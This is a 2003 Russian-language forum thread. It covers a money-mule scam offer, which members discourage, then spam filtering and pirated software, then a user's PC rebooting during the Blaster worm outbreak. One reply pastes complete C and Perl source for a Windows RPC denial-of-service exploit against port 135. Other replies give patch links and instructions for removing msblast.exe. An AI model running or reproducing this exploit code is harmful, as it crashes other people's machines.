Starik
18.06.2003, 09:03
Схема проста как колумбово яйцо - они тырят с чужих кредиток деньги, переводят на твой счет, ты обналичиваешь и тебе на выходе из банка ФБР крутит лопатки и в кутузку. Поди докажи потом, что ты не верблюд.

freeproject
18.06.2003, 14:04
Я бы не советовал Вам доверять этой просьбе.

Natasha
18.06.2003, 14:07
JerrY
Скажите мне номер его аськи.

Ikarus
18.06.2003, 17:54
Наташа а ты не с ФБР случаино как Спектр говорил ? :lol: :lol:

Дмитрий
18.06.2003, 18:34
Во дела - пошла жара! :hah:

Ikarus
19.06.2003, 00:45
Ты погоди Дмитрич , еще и до нас доберутся с подобными накатами ... :biggrin:

Дмитрий
19.06.2003, 09:11
А ты не подскажешь - ПОЕ??АТЬ со колькими буквами "б" пишется? :eek:

Natasha
19.06.2003, 09:14
Первоначальное сообщение от Ikarus
Наташа а ты не с ФБР случаино как Спектр говорил ? :lol: :lol:
А вот и нет :tongue:

Дмитрий
19.06.2003, 09:36
Ой, Наташенька и все дамы, проститя мя за грубые слова - я босе не бу! :shy:

JerrY
19.06.2003, 10:30
Да я понимаю что всей своей информацией рисковать не хочеться ....

Но по его утверждениям, РР ни когда не подаст в суд, а информацию о моем банковском счете, банк, может выдать только ментам при судебном деле .....

короче круговорот, деньги то нужны, хочеться не много подработать !

Relmax
19.06.2003, 10:36
Первоначальное сообщение от JerrY
Да я понимаю что всей своей информацией рисковать не хочеться ....

Но по его утверждениям, РР ни когда не подаст в суд, а информацию о моем банковском счете, банк, может выдать только ментам при судебном деле .....

короче круговорот, деньги то нужны, хочеться не много подработать !

Он же такими высказываниями уже показывает, что нелегально дело. 1 - согласен ли ты помогать вору? 2 - Хочешь ли ты рисковать? ПП ждет, ждет, а потом как начнет всем инфу выдавать... Сколько он тебе % обещал? 30?

JerrY
19.06.2003, 10:45
да 30% обещал ....

Конечно это не легально, легально бы они сами провернули, нашли бы человка, и на основание документов все делали....


здесь воровством пахнет ....
он тоже руский, помочь ему и получить от туда выгоду тоже хорошо ....

ну а кто не рискует тот не пьет шапанского ....

есть жу люди кто так работает и чочень давно без проблем !

freeproject
19.06.2003, 13:31
Уже давно придумано:
- ничего не проси;
- ничего не бойся;
- ничему не верь.

(с) где-то в России

Starik
19.06.2003, 13:50
Первоначальное сообщение от JerrY
да 30% обещал ....

Конечно это не легально, легально бы они сами провернули, нашли бы человка, и на основание документов все делали....


здесь воровством пахнет ....
он тоже руский, помочь ему и получить от туда выгоду тоже хорошо ....

ну а кто не рискует тот не пьет шапанского ....

есть жу люди кто так работает и чочень давно без проблем !

А я бы не стал помогать только потому, что русский. Они то как раз на этом и играют, типа земляк, никогда не откажет. А потом так кидают, что три недели кости собрать не можешь. Самые опасные жулики - земляки.

Relmax
19.06.2003, 19:30
Первоначальное сообщение от JerrY
да 30% обещал ....

Конечно это не легально, легально бы они сами провернули, нашли бы человка, и на основание документов все делали....


здесь воровством пахнет ....
он тоже руский, помочь ему и получить от туда выгоду тоже хорошо ....

ну а кто не рискует тот не пьет шапанского ....

есть жу люди кто так работает и чочень давно без проблем !

Судя по всему ты не ищешь совета, а ищешь одобрения своего поступка (желания). Дело твое, мы не одобряем:)

Дмитрий
19.06.2003, 20:28
Первоначальное сообщение от Relmax
Судя по всему ты не ищешь совета, а ищешь одобрения своего поступка (желания). Дело твое, мы не одобряем:)
Уж я так точно не одобрям! Мусоров не люблю, но и воров, а особо кидал!

Alevtina
20.06.2003, 15:54
Первоначальное сообщение от Spectre
А я бы не стал помогать только потому, что русский. Они то как раз на этом и играют, типа земляк, никогда не откажет. А потом так кидают, что три недели кости собрать не можешь. Самые опасные жулики - земляки. Абсолютно согласна.

Ikarus
21.06.2003, 23:38
У меня вот чего ... ну совсем в дрыск достали спамы , ну те самые рекламные маилы .
В хот-маиле , где у меня почтовыи ящик - есть фильтры , предположим можно заблокировать почту с таким-то доменом , или с таким-то текстом в заглавии .
Наиболее настырные что мне приходят - это (пример)Hotnightseverywere@mx2hguyfgewt.com .
Тексты в заглавиях постоянно варьируются , и после этого , также каждыи раз меняется , то цифра , то домен .
Может до того как я вспылю и поменяю почт.ящик , кто нить порекомендует эффективныи анти-спаммер или что то в этом роде ?
Халявныи , на кряк , или серииныи номер , но не платныи .
Please !!!

snowbird
22.06.2003, 01:35
Икарус, полно этих антиспамеров в сети, не ленись
пользоваться поиском:) Если что-то встречу, более
или менее приличное, дам ссылку:bud:

snowbird добавил(а) 1056237421:
Глянь пока здесь:
http://www.homepc.ru/faq/25553/
http://search.centre.ru/soft/0_Pochta/Anti_spam/

snowbird
22.06.2003, 03:24
Первоначальное сообщение от Alevtina
Абсолютно согласна.

Вы правы, господа... К сожалению, в большинстве
случаев, это так:crazy:

Ikarus
22.06.2003, 06:33
Подтверждаю оное .
Когда я только что снял квартиру , и по стечению обстоятельств - ко мне домои приходило много народу , не в обиду Димычу , из Киева , но все же земляки .... мы же все совковые .
Веселились , кутежили , чего знать надо-пожалуиста , по тел. домои ...недолго-но пожалуиста , башлеи нехватает на спиртное- добавлю , перевести че - пожалуиста , одного даже языку научил . А вот сеичас они уехали в другие страны счастья искать, адрес и телефон мои знают прекрасно , и уже лет 5 ни слуху ни духу . И как прикажете чувствовать себя ?

Ikarus
22.06.2003, 06:53
Сноу , к сожалению на этих ссылках , после клацания на линки , таковые не находются на сервере .
Буду искать .

Alevtina
22.06.2003, 15:57
Скажи спасибо, что дело обошлось только тем, что тебе никто не перезванивает. У меня была подруга (не знакомая, а подруга), с которой мы вместе проработали почти пять лет. которая и работать-то не любила. Я ее постоянно покрывала, выполняла за нее всю работу (ай, ладно, думала, все же друзья). Потом пришла к нам новая директрисса-лесбиянка и положила глаз на мою подругу. а потом сделала ее своим вторым заместителем. Я была рада за нее в любом случае, у нет и восьми классов образования, мать-алкоголичка, муж остался в тюрьме в Магадане, когда она перехала в Израиль. Понятное дело, какая у нее в Магадане была жизнь. Я всячески поддерживала ее и помогала дальше. Помимо всего этого она приходила ко мне в дом, естесственно, праздники, дни рождения, просто поболтать и поплакаться друг дружке. И в один прекрасный день она перестала со мной здороваться. Мало того при людях начала на меня давить. А когда я ей ответила, она приложила максимум усилий, чтобы меня уволили. Вот и все. А ты, Икарус, говоришь о благодарности. Спасибо, что не навредили.

Ikarus
22.06.2003, 21:42
Вот-т-т-т !!! :obida:

snowbird
24.06.2003, 16:08
Первоначальное сообщение от Ikarus
Сноу , к сожалению на этих ссылках , после клацания на линки , таковые не находются на сервере .
Буду искать .

Странненько... Ладно, как увижу что, я тебе сразу
сообщу. Кстати, чем ты пользуешся, Аутглюком или
Летучей крысой :))?

Ikarus
24.06.2003, 20:13
Сноу , вообще ничем , иду напрямую в хот-маил и "режу мясо"
:biggrin:

snowbird
24.06.2003, 21:13
Первоначальное сообщение от Ikarus
Сноу , вообще ничем , иду напрямую в хот-маил и "режу мясо"
:biggrin:

Ну-ну, стараешься лишние проги не иметь... Но советую
качни последний "BAT", Бэтменом, конечно не станешь,
но прога самое то!!!

Starik
25.06.2003, 01:33
Первоначальное сообщение от Ikarus
Сноу , вообще ничем , иду напрямую в хот-маил и "режу мясо"
:biggrin:

У меня два адреса в хот-майле, один старый, имя простое, так спам меня просто достал, 50-60 в день. Другой, новый, имя посложнее, и никакого спама. Правда, последнее время начали потихоньку появлятся, наверняка с нашего форума стырили. Но я в опциях разделил все приходящие емейлы на два - одни, которые от тех, кого я знаю и они прописаны в адресной книге и сейф-листе, идут в главную папку. Остальные - к помойку. В помойке вообще можно выставить опцию, что бы они не 7 дней хранились, а уничтожались сразу.

snowbird
25.06.2003, 02:00
Первоначальное сообщение от Spectre
У меня два адреса в хот-майле, один старый, имя простое, так спам меня просто достал, 50-60 в день. Другой, новый, имя посложнее, и никакого спама. Правда, последнее время начали потихоньку появлятся, наверняка с нашего форума стырили. Но я в опциях разделил все приходящие емейлы на два - одни, которые от тех, кого я знаю и они прописаны в адресной книге и сейф-листе, идут в главную папку. Остальные - к помойку. В помойке вообще можно выставить опцию, что бы они не 7 дней хранились, а уничтожались сразу.

Ситуация знакома- тоже имею несколько адресов, один
из них в качестве помойки, захожу разок в 2 недели и
подчищаю, веришь ли, по 300-400 писем: сплошной спам!
А основной адресок чист- не свечу я его, только для
друзей!

Ikarus
25.06.2003, 03:00
Да , правильно Спектр говорит , можно поставить фильтр , чтоб к тебе приходили лишь из списка , а представьте , кто-то поменял свои адрес и с нового строчит ....
У меня в плане вот че есть ... когда не лень будет , поменяю адресок на новыи , но потом буду ходить на саиты под программои , кот , не позволяет шпионить , ну т.е. ты вписываешь туда определенные саиты , где ты чаще всего , и для роботов- шпионов , твои данные , скрыты !!!!
Если ето получится - !!!!

REmindER
25.06.2003, 21:27
Первоначальное сообщение от snowbird
Ну-ну, стараешься лишние проги не иметь... Но советую
качни последний "BAT", Бэтменом, конечно не станешь,
но прога самое то!!!
А я вот как-то выиграл в журнале "Хакер" лицензионный The Bat, но так и не получил: живу-то далеко... :frown: Было это месяцев 5 назад. Сорри за офф-топик.

snowbird
26.06.2003, 12:12
Первоначальное сообщение от REmindER
А я вот как-то выиграл в журнале "Хакер" лицензионный The Bat, но так и не получил: живу-то далеко... :frown: Было это месяцев 5 назад. Сорри за офф-топик.

Рем, мне кажется в России, да и в бывших странах
ссср никто не пользуется лицензионными прогами,
т.к. практически на любую есть крэк. "The Bat" - не
исключение:)

ЗЫ: Я, кстати, тоже выиграл АVP Касперского( лиценз.),
ответив на какую-то байду в газете! Было это перед
Новым годом, принесли лично
:crazy: Но Каспер тормозит, и недавно перешёл на
Dr.Web

REmindER
26.06.2003, 18:54
Первоначальное сообщение от snowbird
Рем, мне кажется в России, да и в бывших странах
ссср никто не пользуется лицензионными прогами,
т.к. практически на любую есть крэк. "The Bat" - не
исключение:)

ЗЫ: Я, кстати, тоже выиграл АVP Касперского( лиценз.),
ответив на какую-то байду в газете! Было это перед
Новым годом, принесли лично
:crazy: Но Каспер тормозит, и недавно перешёл на
Dr.Web
Ты прав. Сказывается душа заядлого халявщика. Но все-таки подумать - лицензионный. На диске и т.д. Все, как полагается. У меня уже тут, к примеру, этих Windows'ов эдак дисков 15 разных, но из них магазинных только 2. Честно купленых. Просто солидно себя чувствуешь, когда вдруг кому-то надо, а у тебя есть не какое-то барахло китайское или болванка слизанная, а блестящая логотипом пластмасска... Ну, это мне так кажется, кто не особенно привередлив - тот меня не поймет.

snowbird
26.06.2003, 20:33
Первоначальное сообщение от REmindER
Ты прав. Сказывается душа заядлого халявщика. Но все-таки подумать - лицензионный. На диске и т.д. Все, как полагается. У меня уже тут, к примеру, этих Windows'ов эдак дисков 15 разных, но из них магазинных только 2. Честно купленых. Просто солидно себя чувствуешь, когда вдруг кому-то надо, а у тебя есть не какое-то барахло китайское или болванка слизанная, а блестящая логотипом пластмасска... Ну, это мне так кажется, кто не особенно привередлив - тот меня не поймет.

Да нет, я думаю многие бы обзавелись лицензионными
прогами, но дело не в привередливости- дело в ценах
на такой товар... Конечно, это выглядит халявно, но
когда в продаже тот же WinXP Pro за 450$, да Office
по такой же цене, а рядом свободно предлагают
корпоративный, абсолютно не отличающийся от оригинала
диск за 5$...не знаю... Вообщем, дело совести

:shy: Но за эти 800-900 баксов(плата за лицензию) спокойно
куплю отличный комп:crazy:

Ikarus
27.06.2003, 03:32
У меня 5 ящиков с сидюками .... если б все было лицензионным ... это же целое состояние !!! :biggrin:

SrgCo
01.07.2003, 18:56
нет, персона не одна... И пост названный предыдущим не является ответом на пост обращённый к GriKo... :argue:

Eglantine
11.08.2003, 02:50
Я незнаю, что с моим компьютером, но только я с вашей помощью все наладила, какое-то время наслаждалась спокойной работой на компьютере, но недавно началось опять черте-что. Сначала я непоняла почему когда нажимаешь на Пуск (Start) далее All Programs, он выдает сообщение якобы нет места, чтобы показать все программы которые у вас здесь подключены, это странно, потому что места достаточно. А потом иногда сам по себе и всегда когда запускаешь Disk Defragmenter через какое-то время выскакивает окошко, что Remote Procedure Call (RPC) service terminated unexpe...., компьютер должен быть перезагружен, вам 1 минута, чтобы сохранить все. что-то вроде так, если это важно то запущу еще раз Disk Defragmenter и запишу точно.
Вообщем бардак какой-то. Вот. Помогите кто может PLS, а то я ничего не понимаю, что компьютер от меня хочет. :frfr:

Eglantine
11.08.2003, 18:41
Совсем беда 10-15 минут в Инете и выскакивает окошко, что This system is shutting down. Please save all work in progress and log off. Any unsaved changes will be lost. This shutdown was initiated by NT AUTHORITY\SYSTEM.
Message: Remote Procedure Call (RPC) service terminated unexpectedly.

И через минуту перезагружается компьютер! Попробовала выключить кабельный модем, это прекратилось, но как включаю опять начинается. :hlp:

Ikarus
11.08.2003, 21:46
Либо это что-то в регистре , либо ... слухом не вирус ???

Eglantine
11.08.2003, 22:34
Что делать?

REmindER
12.08.2003, 20:00
Не бойся, eglantine. Дело в том, что кто-то очень злобный, видимо, сканит вашу зону прова и вызывает так называемый RPC сервис - Remote Procedure Call (Вызов удаленной процедуры). RPC - это технология, используемая при работе распределенных приложении и позволяющая приложению выполнять процедуры на другой машине в сети. Управление достается на уровне аутентификации путем использование специальных шелл-кодов. Даже приведу код эксплоита на СИ:
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char sendcode1[] = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x 02\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01 \x00\x00\x00\x00\x00\x01\x00\x60\x9e\xe7\xb9\x52\x 3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f\x02\x00 \x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x 08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00 \x01\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x 00\x20\x27\x01\x00\x00\x00\x02\x00\xf0\x00\x00\x00 \x00\x00\x00\x00\xf0\x00\x00\x00";
char sendcode2[] = "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";
char sendcode3[] = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00 \x00\x00\x00\x00\x02\x00\x00";
char sendcode4[] = "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x 3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d \x3d\x3d\x3d\x3d\x3d\x3d\x3d\x05\x00\x00\x00\x10\x 00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00\x50\x10 \x01\x00\x00\x00\x02\x00"; char sendcode5[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x 8f\x00\x00\x00\x80\xf9\x00\x00\x00\x00\x02\x00"; char sendcode6[] = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x 8f\x00\x00\x00\xb0\xe2\x00\x00\x00\x00\x02\x00"; char sendcode7[] = "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x 8f\x00\x00\x00\x60\x15\x00\x00\x00\x00\x02\x00"; char sendcode8[] = "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x 00\x00";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *targetip;
int port,bufsize;
SOCKET s;
char buffer[20480];
printf("========================= HUC Win2000/XP RPC Nuke V0.10 =======================\r\n");
printf("================= By Lion, Welcome to http://www.cnhonker.com =================\r\n\n");
if (argc < 2)
{
printf("Usage:\r\n");
printf(" %s <TargetIP> [TargetPort]\r\n", argv[0]);
printf("Example:\r\n");
printf(" %s 192.168.0.1\r\n", argv[0]);
printf(" %s 192.168.0.1 135\r\n", argv[0]);
printf("PS:\r\n");
printf(" If target is XP, try 2 times.\r\n");
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
targetip = argv[1];
port = 135;
if (argc >= 3) port = atoi(argv[2]); bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
s = socket(AF_INET, SOCK_STREAM, 0); if(s==INVALID_SOCKET) { printf("Socket error!\r\n"); exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("Resolve of %s failed, please try again.\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn&apos;t connect to host.\n"); exit(1);
}
printf("Connected!...\n");
printf("Sending Packets...\n");
if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
{
printf("Error sending nuke Packets\r\n");
closesocket(s);
exit(1);
}
memset(&buffer, &apos;\x41&apos;, 240);
send(s, buffer, 240, 0);
send(s, sendcode2, sizeof(sendcode2)-1, 0);
memset(&buffer, &apos;\x42&apos;, 5000);
send(s, buffer, 5000, 0);
send(s, sendcode3, sizeof(sendcode3)-1, 0);
memset(&buffer, &apos;\x43&apos;, 512);
send(s, buffer, 512, 0);
send(s, sendcode4, sizeof(sendcode4)-1, 0);
memset(&buffer, &apos;\x44&apos;, 5000);
send(s, buffer, 5000, 0);
send(s, sendcode5, sizeof(sendcode5)-1, 0);
memset(&buffer, &apos;\x45&apos;, 5000);
send(s, buffer, 5000, 0);
send(s, sendcode6, sizeof(sendcode6)-1, 0);
memset(&buffer, &apos;\x46&apos;, 5000);
send(s, buffer, 5000, 0);
send(s, sendcode7, sizeof(sendcode7)-1, 0);
memset(&buffer, &apos;\x47&apos;, 5000);
send(s, buffer, 5000, 0);
send(s, sendcode8, sizeof(sendcode8)-1, 0);
memset(&buffer, &apos;\x48&apos;, 5000);
send(s, buffer, 5000, 0);
printf("Nuked! \r\nIf target is XP, try a again! :)\r\n");
closesocket(s);
WSACleanup();
return 0;
}

И даже нашел на Перле:

#!/usr/bin/perl
# MS WIN 2000/XP RPC DoS exploit
# by r3d_Dr4g0n [n-force group]
# mailto: r3d_dr4g0n@mail.ru # original code on C by lion

$sendcode1 = "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x 02\x00\x00\x00". "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x 00\x00\x01\x00". "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x 69\x01\x29\x3f". "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x 9f\xe8\x08\x00". "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x 10\x00\x00\x00". "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x 00\x00\x02\x00". "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";
$sendcode2 = "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";
$sendcode3 = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x 00\x00\x00\x00". "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x 00\x02\x00\x00";
$sendcode4 = "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x 3d\x3d\x3d\x3d". "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x 3d\x3d\x3d\x3d". "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x 8f\x00\x00\x00". "\x50\x10\x01\x00\x00\x00\x02\x00";
$sendcode5 = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x 8f\x00\x00\x00". "\x80\xf9\x00\x00\x00\x00\x02\x00"; $sendcode6 = "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x 8f\x00\x00\x00". "\xb0\xe2\x00\x00\x00\x00\x02\x00"; $sendcode7 = "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x 8f\x00\x00\x00". "\x60\x15\x00\x00\x00\x00\x02\x00"; $sendcode8 = "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x 00\x00";
if(@ARGV < 1)
{
usage();
}
nukem($ARGV[0],$ARGV[1]);

sub nukem
{
use Socket;
my $remote = shift;
my $port = shift;
my($buffer,$paddr,$proto,$iaddr);
if(!defined($port))
{
$port=135
}
#$iaddr = inet_aton($remote) or die "Error: $!";
print "Resolving host...\n";
if(!($iaddr = gethostbyname($remote)))
{
print "Can&apos;t resolve $remote, please try again.\n";
#exit;
return 0;
}
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname(&apos;tcp&apos;) or die "Error: $!";
if(!socket(SOCK, PF_INET, SOCK_STREAM, $proto))
{
print "Socket error !\n";
#exit;
return 0;
}
print "Connecting...\n";
if(!connect(SOCK, $paddr))
{
print "Couldn&apos;t connect to host.\n";
#exit;
return 0;
}
print "Connected...\n";
print "Sending packets...\n";
if(!send(SOCK,$sendcode1,0))
{
print "Error sending nuke packets !\n";
#exit;
return 0;
}
$buffer = "\x41" x 240;
send(SOCK,$buffer,0);
send(SOCK,$sendcode2,0);
$buffer = "\x42" x 5000;
send(SOCK,$buffer,0);
send(SOCK,$sendcode3,0);
$buffer = "\x43" x 512;
send(SOCK,$buffer,0);
send(SOCK,$sendcode4,0);
$buffer = "\x44" x 5000;
send(SOCK,$buffer,0);
send(SOCK,$sendcode5,0);
$buffer = "\x45" x 5000;
send(SOCK,$buffer,0);
send(SOCK,$sendcode6,0);
$buffer = "\x46" x 5000;
send(SOCK,$buffer,0);
send(SOCK,$sendcode7,0);
$buffer = "\x47" x 5000;
send(SOCK,$buffer,0);
send(SOCK,$sendcode8,0);
$buffer = "\x48" x 5000;
send(SOCK,$buffer,0);
print "Nuked !\n";
close(SOCK);
return 1;
}

sub usage
{
$d = ":" x 23;
print $d."[ MS WIN 2000/XP RPC DoS Exploit ]".$d."\n";
print $d."[ by r3d_Dr4g0n ]".$d."\n";
print "Usage:\n"; print " $0 <Addr> [Port]\n";
print "Example:\n";
print " $0195.46.50.1\n";
print " $0195.46.50.1135\n";
print " $0 www.lame.com\n";
exit;
}

Дело в том, что RPC сервис слушается на портах TCP/UDP 135, 139, 445. Просто ставишь файрволл, которому указываешь, что на данный порт блокировать все обращения. Кроме того лучше еще бы и заблокировать работу модулей DCOM.

REmindER добавил(а) 1060710672:
Да, еще. На данные момент в системе RPC обнаружена ошибка Buffer Overrun In RPC Interface Could Allow Code Execution (823980), позволяющая на удаленной машине выполнить какой-либо программый код. Для решения этой проблемы выпустили патч. Ссылка: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-026.asp

snowbird
13.08.2003, 01:37
Первоначальное сообщение от eglantine
Совсем беда 10-15 минут в Инете и выскакивает окошко, что This system is shutting down. Please save all work in progress and log off. Any unsaved changes will be lost. This shutdown was initiated by NT AUTHORITY\SYSTEM.
Message: Remote Procedure Call (RPC) service terminated unexpectedly.

И через минуту перезагружается компьютер! Попробовала выключить кабельный модем, это прекратилось, но как включаю опять начинается. :hlp:

Сейчас по сети ходит новый вирус, очень много
компов пострадали:mpr: Срочно нужно качать
заплатку!!!
Для ХР(рус):
http://download.microsoft.com/downl...980-86-RUS.exe
Для ХР(англ):
http://download.microsoft.com/downl...980-86-ENU.exe
ЭТО СЕРЬЁЗНО!!!
Поражённый комп выдаёт такую байду:

snowbird добавил(а) 1060728501:
Можешь почитать на эту ему подробнее
http://www.livejournal.com/users/olegart/33500.html

snowbird
13.08.2003, 02:13
И ещё на эту тему

Starik
13.08.2003, 07:18
Это явно вирус, мой анти-вирус говорит, что симптомы очен похожи на заражение вирусом W32/Lovsan.worm . Надо срочно лечится.

REmindER
13.08.2003, 16:10
Да-да... Мои знакомые тоже встретились с этой проблемой.

REmindER добавил(а) 1060780856:

Ошибка 823980 - неконтролируемая возможность переполнения буфера и последующее затирание кода, берущего свое начало за пределами буфера. Т.е. при обращении к этой части кода по сути будет исполнен код, который являлся на самом деле данными из буфера. Главное все расчитать. Прием очень распространенный.

Eglantine
13.08.2003, 19:37
Спасибо всем, ребята за отклик.
Что было дальше:
Эти окошки выскакивали и выскакивали все чаще и чаще, отключив кабельный модем я проверила через DrWeb на вирусы - чисто, запустила Ad-aware - ничего. Вечером компьтер не включался с кабелькой, и мой муж срочно запустил Windows Update, работало все это долго мы даже демали, что компьютер повис, но нет вроде работает, тогда мы оставили его работать, а сами ушли спать. Утром на мониторе было окно, что Windows Update прошло успешно.
Все вроде заработало. Мы еще раз проверяли компьютер антивирусниками DrWeb, Касперским, потом муж нашел какой-то ативирусник он-лайн, и еще какой-то, но ни один из них не обнаружил никаких признаков вируса.
Окно больше не выскакивает, но на сегодня проблема такая многие параметры (или как их там) Windows не загружает, ругается, муж вчера весь вечер просидел все пытался установить все до конца, но так ничего и вышло. Сегодня я решила запустить Дефрагментацию диска, когда открыла, то увидела, что у нас на компьютере, вместо 45% свободного места, сейчас только 3%.
И появилась папка на диске С: 40dc704ed2111e6d2a8a5f5d6c9da0be
Я думаю, что это Update сохранило старые данные.

Вообщем муж уходя на работу сказал, чтобы я сохранила все нужную информация на CD, а вечером запустим форматирование диска, но я незнаю действительно ли это необходимо, я думаю это крайняя мера.
Что вы думаете?

eglantine добавил(а) 1060793341:
Ребята я - просто пользователь компьютера, не программист и мой муж тоже, поэтому читая сейчас на http://www.livejournal.com/users/olegart/33500.html

Если вы уже умудрились подхватить червя, то можно попробовать найти его самостоятельно. Исполняемый файл называется msblast.exe и занимает около 11 кбайт - его необходимо удалить. Также надо удалить из ключа HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run реестра запись "windows auto update"="msblast.exe".

у меня возник такой вопрос:
Запустила поиск msblast.exe, нет такого. ОК.
А как удалить из ключа, а сначала посмотреть, есть ли такой в наличие HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run реестра запись "windows auto update"="msblast.exe"
Где это искать? Объяните PLS для чайника.

Ikarus
13.08.2003, 20:07
Не даите мне ошибиться , знатоки , но насколько я знаю - это "Регистр" . Есть некоторые проги , кот. редактируют регистр , типа Norton System Works .
Если такового нет , то редакция регистра запускается из :
RUN : regedit.exe
Можно использовать также "Register Cleaner" , программка позволяющая в ручную (и авто тоже...) чистить регистр , тока надо осторожно с этим Eglantine !!!

Eglantine
13.08.2003, 20:55
Спасибо Икарус, посмотрела, нет у меня этой гадости там!

eglantine добавил(а) 1060797532:
А что если удалить эту новую появившуюся папку на С: 40dc704ed2111e6d2a8a5f5d6c9da0be
Если сейчас все работает, то эти Update сохраненные старые данные может больше не нужны? А то уж очень больно много места занимает эта папка.

eglantine добавил(а) 1060797748:
Знаете только сейчас обратила внимание

Эту заплатку мы и пытаемся установить!!!
Для ХР(англ):
http://download.microsoft.com/downl...980-86-ENU.exe

Но она не устанавливается, я думаю из-за нехватки места 3%?

snowbird
13.08.2003, 22:36
[QUOTE]Первоначальное сообщение от eglantine
Спасибо Икарус, посмотрела, нет у меня этой гадости там!

[b]eglantine добавил(а) 1060797532:
А что если удалить эту новую появившуюся папку на С: 40dc704ed2111e6d2a8a5f5d6c9da0be
Если сейчас все работает, то эти Update сохраненные старые данные может больше не нужны? А то уж очень больно много места занимает эта папка.

eglantine добавил(а) 1060797748:
Знаете только сейчас обратила внимание

Эту заплатку мы и пытаемся установить!!!
Для ХР(англ):
http://download.microsoft.com/downl...980-86-ENU.exe

Eglantine, ищи червя ->C:\Windows\System32
(Открой папку Windows, найди папку System32 и
внимательно просмотри файлы, ищи msblast.exe)
Найдёшь-убей!
По реестру- ПУСК->выполнить->regedit
Открой ветку HKLM\Software\Microsoft\Windows\Current Version\Run
Windows autoupdate=msblast.exe I just want to say
love you SAN! bill (удали!)
Антивирус этого червя не обнаруживает, правда
DrWeb, кажется, нашёл управу... Так что всё надо
делать вручную:( Насчёт твоей папки-не знаю,
попробуй сделать точку восстановления, потом
убей её (если всё равно будешь Format C:
ЗЫ: У меня заплатка установилась без проблем:)

snowbird добавил(а) 1060809468:
Эта утилита от "Symantec" способна удалять из
системы червя и устранять последствия его
пребывания:
http://securityresponse.symantec.com/avcenter/FixBlast.exe

Eglantine
14.08.2003, 17:52
Искали и этой программкой тоже -
http://securityresponse.symantec.co...er/FixBlast.exe - ничего!
Но сейчас я думаю ничего нет, потому что мы Windows обновили весь.

Ребят, а как закрыть эти самые порты по которым этот вирус приходит?

eglantine добавил(а) 1060873562:
Сейчас пробовала удалить эту самую появившуюся папку на С: 40dc704ed2111e6d2a8a5f5d6c9da0be, не удаляется, начинается все нормально, но буквально через пару секунд окошко удаления просто исчезает, а папка эта на 214MB.

snowbird
15.08.2003, 15:12
Первоначальное сообщение от eglantine
Искали и этой программкой тоже -
http://securityresponse.symantec.co...er/FixBlast.exe - ничего!
Но сейчас я думаю ничего нет, потому что мы Windows обновили весь.

Ребят, а как закрыть эти самые порты по которым этот вирус приходит?

eglantine добавил(а) 1060873562:
Сейчас пробовала удалить эту самую появившуюся папку на С: 40dc704ed2111e6d2a8a5f5d6c9da0be, не удаляется, начинается все нормально, но буквально через пару секунд окошко удаления просто исчезает, а папка эта на 214MB.

Попробуй удалить её в Safe Mode, или, если есть
такая прога, Windows Commander( Total Commander).
Как закрыть порты в самой Винде я не в курсе, нужно
поставить защиту, какой нибудь Файрволл и настроить как хочешь. У меня стоит "Касперский антихакер", очень прилично работает. Вот ссылка
